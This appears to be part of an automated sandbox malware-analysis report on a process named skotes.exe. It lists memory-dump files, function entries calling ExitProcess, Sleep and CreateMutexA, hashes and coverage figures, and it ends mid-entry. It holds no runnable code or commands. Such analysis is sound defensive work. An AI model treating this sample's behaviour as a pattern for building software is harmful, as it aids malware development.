Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: dfe8ab4f2b5dca51aae1270f296b674aa539887999c21ef29ab8e1a1d26dc9b2
Instruction ID: 0a99d14c7e75aa0e0b20cd1a66659e82faa95eb9f69eeab6d9c6939656b8042a
Opcode Fuzzy Hash: dfe8ab4f2b5dca51aae1270f296b674aa539887999c21ef29ab8e1a1d26dc9b2
Instruction Fuzzy Hash: 14211B71A00219AFDF00EBA4DC859FEB7B9EF48710F100069FA05A7261DB349D81ABE1

Analysis Process: skotes.exePID: 7756, Parent PID: 7552COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1875
Total number of Limit Nodes:	9

Executed Functions

Function 0097652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0097652A,?,?,?,?,?,00977661), ref: 00976566

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f1f911fe53f56c08255af5c9ac3a457393284b475087f3fdb47942471c36f593
Instruction ID: c8efa8e87be124e2de0e6ec8f0144dbe2397c7cfb74d46973326dd1d78813587
Opcode Fuzzy Hash: f1f911fe53f56c08255af5c9ac3a457393284b475087f3fdb47942471c36f593
Instruction Fuzzy Hash: 46E08C32141508AFCF25BF18C80DE4C3B6AEB91742F108810F8084A626CB25DE92D680

Function 00949BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3c0b03dba5800dea1fa39c1a444158c1ca52839ca043c7bb1fe7b70120cfc3f9
Instruction ID: 9a98f6447bbfcc3e67f283e27a6ba42c2c97b5a16130421ef622506d8ad22722
Opcode Fuzzy Hash: 3c0b03dba5800dea1fa39c1a444158c1ca52839ca043c7bb1fe7b70120cfc3f9
Instruction Fuzzy Hash: 603168317442008BEB18DB7CDCCAB6EBBA6EFC6311F248218E418973D6C77589808751

Function 00949F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9c01ebb03131892b492123e195fc7d6a0e96d6af206be4dd5624ab5e259f1327
Instruction ID: 35973e89beed002dbc6e0bc9e5aa4c7f6e476743ccafc613e4268424d57bc2f9
Opcode Fuzzy Hash: 9c01ebb03131892b492123e195fc7d6a0e96d6af206be4dd5624ab5e259f1327
Instruction Fuzzy Hash: AC3159317441018BEB18DB7CDC8DFAEB7A6EFC6310F248618E418EB2D2D77689848752

Function 0094A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6e3b53b00ada645f978a9499265517d2ee4bc40dba3810556496f243b9a1e811
